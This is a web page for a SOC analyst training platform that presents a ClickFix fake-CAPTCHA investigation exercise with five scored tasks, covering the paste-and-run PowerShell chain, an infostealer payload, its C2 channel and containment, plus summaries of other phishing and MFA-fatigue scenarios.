
ClickFix: The Fake CAPTCHA Trap
The ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick victims into copying, pasting, and running malicious content. In this scenario, a user was targeted with a 'Verify You Are Human' CAPTCHA check that led to a significant endpoint compromise. You will analyze the 'paste-and-run' execution chain, investigate PowerShell activity initiated via the Windows Run dialog, and identify the deployment of an information stealer.
Start this operation
Create your free account and begin immediately.
Get Early Access — FreeFree forever — no credit card required
Investigation Tasks
Complete each task by investigating alerts and submitting your findings.
The ClickFix Trap
5Before investigating the telemetry, understand HOW the attacker got their command to run. ClickFix never delivers a file the browser can block — so what is the delivery mechanism the victim is tricked into using? Name the Windows component that carries the attacker's command from the fake CAPTCHA page into the Run dialog.
Pinpoint the Loaded Malicious Library
10You understand the ClickFix lure — now move to the endpoint. After the PowerShell command ran, the XDR file monitor on corp-wks-102 captured a burst of file activity, and one of those files is the malicious library that regasm.exe loaded into memory. Most entries are normal Windows and Office noise. Which file is the attacker's library?
Trace the Payload Download to its Source IP
10You have the malicious library; now find where it came from. The ClickFix PowerShell command pulled l6E.exe down from an external host before regasm.exe ever touched it. A domain name alone is not enough for a firewall block or a hunt across other hosts — you need the IP it resolved to. Review the SIEM network logs from corp-wks-102 and identify the server that delivered the payload.
Unmask the Command-and-Control Destination
10You know how the malware arrived and what it loaded. Now find where the stolen data went. After cleanuploader.exe read Anita's Chrome credential store, it opened an outbound channel that tries to look like normal Microsoft cloud traffic. Use the XDR process tree to confirm which process is exfiltrating, then work the firewall logs to expose the true destination behind the disguise.
Containment and Lessons Learned
5You have reconstructed the entire ClickFix chain — lure, execution, the loaded library, the payload source, and the live C2 channel. The workstation is still online, still talking to the attacker, and carries a persistence key that will relaunch the malware. Review the summary and the persistence finding, then make the call: of the five containment actions offered, which one should you take FIRST?
5 tasks · 40 points total
Start investigationTraining Tools
Skills You'll Build
Ideal for newcomers to SOC operations. Guided investigation with clear indicators.
Prerequisites
- No prior experience required
- Familiarity with SIEM concepts
- Familiarity with XDR concepts
Ready to investigate?
Create your free account and begin immediately.
Get Early Access — FreeFree forever — no credit card required
More Operations
View allCredential Harvesting: The Lookalike Login
Investigate an adversary-in-the-middle (AiTM) credential phishing campaign that lured an employee to a lookalike Microsoft 365 login page. Working entirely from SIEM logs, you will identify the lookalike domain, reconstruct the multi-hop redirect chain through a compromised legitimate site, uncover a secondary phishing wave against another employee, and confirm account takeover in Azure AD sign-in logs via impossible travel and session-token replay. You finish by choosing the containment action that actually evicts an attacker holding a valid session token. Foundational skills for SOC analysts in lookalike-domain analysis and identity-centric incident response.
QR Code Phishing: Scan to Compromise
In this scenario, you will investigate a modern 'Quishing' (QR phishing) attack that bypassed traditional email filters by hiding its payload inside an image. You will trace the full chain: a spoofed MFA-enrollment lure sent from purpose-built infrastructure, a redirect server that conceals the final destination, and an Evilginx-style adversary-in-the-middle page that stole an authenticated session cookie despite MFA. You will then follow the attacker's post-compromise moves — Graph API mailbox enumeration, SharePoint exfiltration, and a hidden inbox forwarding rule — and choose the containment action that actually evicts them.
MFA Fatigue: The Notification Flood
In this guided walkthrough, you will step into the shoes of a SOC analyst investigating a modern identity-based attack. The threat landscape in 2026 has shifted: adversaries are no longer just 'breaking in'—they are logging in. You will analyze real-time identity signals, correlate disparate log sources across a hybrid cloud environment, and identify the markers of an MFA fatigue attack used by the FlowerStorm phishing kit. This scenario highlights the critical importance of behavioral analysis over simple IOC matching in an era of malware-free intrusions and compromised human identities.